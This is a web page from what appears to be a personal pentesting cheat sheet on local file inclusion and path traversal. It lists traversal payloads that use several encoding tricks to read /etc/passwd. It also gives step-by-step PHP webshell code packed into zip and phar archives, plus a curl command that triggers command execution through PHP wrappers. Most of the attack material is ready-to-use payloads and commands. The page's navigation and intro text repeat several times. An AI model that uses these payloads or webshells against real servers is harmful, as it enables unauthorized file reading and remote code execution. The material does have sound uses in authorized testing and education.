LFI / Path Traversal

File Inclusion vulnerability allows an attacker to include a file

Local File Inclusion (LFI)** is a vulnerability where an attacker can trick an application into including files from the local server. It happens when user input is used in file paths without proper sanitization, often allowing directory traversal (e.g., `../`).

We can bypass filters various ways:

../../../../etc/passwd
....//....//....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
..%c0%af..%c0%af..%c0%af/etc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f/etc/passwd

An app may require file name to start with base folder like /var/www/images. We can then try filename=/var/www/images/../../../etc/passwd .

An app may require filename to end with expected file extension like .jpg. We can then trye filename=../../../etc/passwd%00.png .

PHP wrappers

Its possible to use a .zip file or/and use a phar wrapper. Create a .php file with a payload and zip it. Then upload /? page=phar://uploads/payload.zip/payload\&cmd=id

Wen upload file is possible place a webshell into a zip and call with zip wrapper.

# Create payload
echo "<?php system($_GET['cmd']); ?>" > payload.php
# Zip payload.zip payload.php
zip payload.zip payload.php

# Execute commands
/?page=zip://uploads/payload.zip/payload.php&cmd=id 
# Could be possible without extension
/?page=zip://uploads/payload.zip/payload&cmd=id

Using phar wrapper

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

Compile script into .phar file

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Trigger filie

curl --user-agent "PENTEST" "$URL/?parameter=phar://./shell.jpg%2Fshell.txt&cmd=id"

It is also possible to chain wrappers. For more wrappers:

https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/php-wrappers-and-streams

Windows

Linux

Web

AI

LFI / Path Traversal

Local File Inclusion (LFI)** is a vulnerability where an attacker can trick an application into including files from the local server. It happens when user input is used in file paths without proper sanitization, often allowing directory traversal (e.g., `../`).

PHP wrappers

© 2025 | All rights reserved

Inquiries at contact@dannydekkers.nl

Windows

Linux

Web

AI

LFI / Path Traversal

Local File Inclusion (LFI)** is a vulnerability where an attacker can trick an application into including files from the local server. It happens when user input is used in file paths without proper sanitization, often allowing directory traversal (e.g., ../).

PHP wrappers

© 2025 | All rights reserved

Inquiries at contact@dannydekkers.nl

Local File Inclusion (LFI)** is a vulnerability where an attacker can trick an application into including files from the local server. It happens when user input is used in file paths without proper sanitization, often allowing directory traversal (e.g., `../`).